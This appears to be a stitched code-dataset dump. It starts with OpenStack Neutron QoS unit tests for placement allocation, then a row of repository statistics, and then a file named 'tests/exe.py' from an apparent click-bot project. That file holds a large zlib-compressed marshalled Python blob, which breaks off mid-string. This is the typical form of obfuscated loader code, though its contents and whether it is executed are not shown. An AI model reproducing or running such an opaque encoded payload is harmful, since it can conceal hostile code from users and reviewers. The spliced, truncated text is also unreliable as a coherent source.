qos = self._make_qos_policy()
port_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
# Port which is not compute bound
self._make_port(network_id=network.id, qos_policy_id=None,
device_owner='uu:id')
# Port with overwritten QoS policy
self._make_port(network_id=network.id, qos_policy_id=port_qos.id,
device_owner='compute:uu:id')
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_remove_qos(self):
original_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network()
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type',
profile={'allocation': 'fake_allocation'})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 1)
mock_alloc_change_calls = [
mock.call(
original_qos,
None,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': None},
mock.ANY),
]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
self.assertDictEqual(port1.bindings[0].profile, {})
def test_check_network_for_placement_allocation_change(self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
port2 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port2_binding = ports_object.PortBinding(
self.context, port_id=port2.id, host='fake_host2',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port2_binding.create()
port2.bindings = [port2_binding]
port2.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {'allocation': 'fake_allocation'}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 2)
mock_alloc_change_calls = [
mock.call(
original_qos,
qos,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY),
mock.call(
original_qos,
qos,
{'id': port2.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY)]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
port2.update()
self.assertDictEqual(
port1.bindings[0].profile, {'allocation': 'fake_allocation'})
self.assertDictEqual(
port2.bindings[0].profile, {'allocation': 'fake_allocation'})
def _prepare_port_for_placement_allocation(self, original_qos,
desired_qos=None,
qos_network_policy=None,
original_min_kbps=None,
desired_min_kbps=None,
original_min_kpps=None,
desired_min_kpps=None,
is_sriov=False):
kwargs = self._prepare_for_port_placement_allocation_change(
original_qos, desired_qos, qos_network_policy=qos_network_policy)
orig_port = kwargs['original_port']
qos = original_qos or qos_network_policy
qos.rules = []
allocation = {}
if original_min_kbps:
qos.rules += [self._make_qos_minbw_rule(
qos.id, min_kbps=original_min_kbps,
rule_id=TestQosPluginDB.QOS_MIN_BW_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_BW_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_BW_RP})
if original_min_kpps:
qos.rules += [self._make_qos_minpps_rule(
qos.id, min_kpps=original_min_kpps,
rule_id=TestQosPluginDB.QOS_MIN_PPS_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_PPS_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_PPS_RP})
if desired_qos:
desired_qos.rules = []
if desired_min_kbps:
desired_qos.rules += [self._make_qos_minbw_rule(
desired_qos.id, min_kbps=desired_min_kbps)]
if desired_min_kpps:
desired_qos.rules += [self._make_qos_minpps_rule(
desired_qos.id, min_kpps=desired_min_kpps)]
binding_prof = {}
if is_sriov:
binding_prof = {
'pci_slot': '0000:42:41.0',
'pci_vendor_info': '8086:107ed',
'physical_network': 'sriov_phy'
}
binding_prof.update({'allocation': allocation})
orig_port.update(
{'binding:profile': binding_prof,
'device_id': 'uu:id'}
)
return orig_port, kwargs['port']
def _assert_pci_info(self, port):
self.assertIn('pci_slot', port['binding:profile'])
self.assertIn('pci_vendor_info', port['binding:profile'])
self.assertIn('physical_network', port['binding:profile'])
def test_change_placement_allocation_increase(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps_and_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500},
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
def test_change_placement_allocation_change_direction_min_pps_and_min_bw(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'egress'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -500,
'NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC': 1000},
self.MIN_BW_RP: {
'NET_BW_IGR_KILOBIT_PER_SEC': -1000,
'NET_BW_EGR_KILOBIT_PER_SEC': 2000}})
def test_change_placement_allocation_change_dir_min_pps_ingress_to_any(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'any'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.assertRaises(NotImplementedError,
self.qos_plugin._change_placement_allocation, qos1, qos2,
orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_min_bw_dataplane_enforcement_with_pps(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=1000, original_min_kpps=500,
desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500}})
def test_change_placement_allocation_decrease(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kbps=2000,
desired_min_kbps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_decrease_min_pps(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kpps=2000,
desired_min_kpps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_no_original_qos(self):
qos1 = None
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_no_original_allocation(self):
qos1 = self._make_qos_policy()
rule1_obj = self._make_qos_minbw_rule(qos1.id, min_kbps=500)
qos1.rules = [rule1_obj]
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_policy_empty(self):
qos1 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000, original_min_kpps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000},
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -2000}})
def test_change_placement_allocation_no_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule1 = rule_object.QosDscpMarkingRule(dscp_mark=16)
bw_limit_rule2 = rule_object.QosDscpMarkingRule(dscp_mark=18)
qos1.rules = [bw_limit_rule1]
qos2.rules = [bw_limit_rule2]
orig_port = {
'binding:profile': {'allocation': {
self.MIN_BW_REQUEST_GROUP_UUID: self.MIN_BW_RP}},
'device_id': 'uu:id',
'id': '9416c220-160a-11ec-ba3d-474633eb825c',
}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_old_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=2000)
qos1.rules = [bw_limit_rule]
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
qos2.rules = [bw_limit_rule]
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
def test_change_placement_allocation_equal_minkbps_and_minkpps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=1000,
original_min_kpps=1000, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_update_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = ks_exc.Conflict(
response={'errors': [{'code': 'placement.concurrent_update'}]}
)
self.assertRaises(
neutron_qos_exc.QosPlacementAllocationUpdateConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_update_generation_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = (
pl_exc.PlacementAllocationGenerationConflict(
consumer=self.MIN_BW_RP))
self.assertRaises(
pl_exc.PlacementAllocationGenerationConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_qos_network_policy(self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
None, desired_qos, qos_network_policy=qos_network,
original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos_network, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
| 45.742969 | 79 | 0.617556 | 14,623 | 128,492 | 5.009027 | 0.034877 | 0.028015 | 0.031592 | 0.037681 | 0.893115 | 0.859626 | 0.827338 | 0.795732 | 0.770202 | 0.744781 | 0 | 0.00935 | 0.292501 | 128,492 | 2,808 | 80 | 45.759259 | 0.796377 | 0.008242 | 0 | 0.659209 | 0 | 0 | 0.120803 | 0.06922 | 0 | 0 | 0 | 0 | 0.079904 | 1 | 0.069117 | false | 0 | 0.012385 | 0.003596 | 0.094686 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b
| 14,182 |
py
|
Python
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | 4 |
2021-02-11T13:43:55.000Z
|
2021-11-14T20:16:34.000Z
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | 3 |
2021-10-04T12:16:00.000Z
|
2021-12-10T06:02:41.000Z
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | null | null | null |
import marshal as ms
import zlib
import base64 as bs
data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 \x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\xe3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\